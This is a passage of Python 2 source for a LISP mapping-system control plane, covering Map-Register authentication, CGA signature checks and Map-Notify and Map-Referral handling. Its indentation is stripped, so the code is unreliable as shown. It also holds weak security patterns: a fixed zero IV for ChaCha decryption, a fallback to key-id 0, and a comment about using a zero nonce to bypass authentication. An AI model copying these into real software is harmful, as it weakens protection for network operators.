# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Lookup CGA hash in mapping datbase to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer an a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the catentation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse first 4 bytes which is not encrypted. If packet is not encrypted,
# return to caller. If it is encrypted, get 3-bit key-id next to e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return a unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allowing overlapping ams registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge being requested get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister entry if source of Map-Reqister is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for thie site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
# Send Map-Noitfy to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process as already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False), rloc.rle.print_rle(False)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get map-server so we can do statistics and find auth-key, if a auth-key
# was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endof
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in Map-Reply message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from cached entry
# that wasn't in packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
